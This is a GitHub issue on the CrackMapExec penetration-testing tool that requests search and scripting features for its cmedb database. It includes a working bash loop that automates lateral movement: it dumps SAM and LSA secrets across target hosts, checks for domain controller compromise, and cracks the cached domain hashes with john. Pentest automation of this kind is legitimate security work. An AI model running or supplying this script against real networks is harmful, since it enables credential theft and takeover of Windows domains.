Closed s0i37 closed 3 years ago
Ok. Currently I can implement lateral movement automation like this:

```bash
sort targets.txt
cme smb -d . -u admin -p password --shares 10.0.0.10 #initial creds
id=1
while :
do
    cme smb -id $id --sam <(comm -23 targets.txt <(sqlite3 ~/.cme/workspaces/default/smb.db "select c.ip from computers as c, users as u, admin_relations as r where r.userid=u.id and r.computerid=c.id"|sort))
    cme smb -id $id --lsa <(comm -23 targets.txt <(sqlite3 ~/.cme/workspaces/default/smb.db "select c.ip from computers as c, users as u, admin_relations as r where r.userid=u.id and r.computerid=c.id"|sort))
    sqlite3 ~/.cme/workspaces/default/smb.db "delete from users where username='Guest'"
    sqlite3 ~/.cme/workspaces/default/smb.db "delete from users where username='DefaultAccount'"
    cme smb -id $id --shares dc.txt 2>&1 | grep Pwn3d && break
    ((id++))
done
grep -r @ ~/.cme/logs; fgrep -ar '\' ~/.cme/logs | fgrep -v '$:'
john --format=mscash2 <(sort -u ~/.cme/logs/*.cached)
john --format=mscash2 <(sort -u ~/.cme/logs/*.cached) --show
```

It seems that `cme` doesn't appropriately handle pipe input.

Fix crackmapexec.py:

```python
target_file_type = '' #identify_target_file(target)
```

Hello. I want to suggest improving the current cmedb opportunities a bit. Currently `hosts` can search only for IP and Hostname. Maybe it needs to search the other available columns too?

And the same for `creds`:

Also it would be very nice if we could use `cmedb` and `cme` together to automatically cover all credentials for all available hosts. I expected something like this:

Hence `cmedb` should also read commands via arguments, like `cmedb "workspace company_x;hosts 10.0.0; hosts 11.0.0"`. I suppose all of these things could be implemented very easily)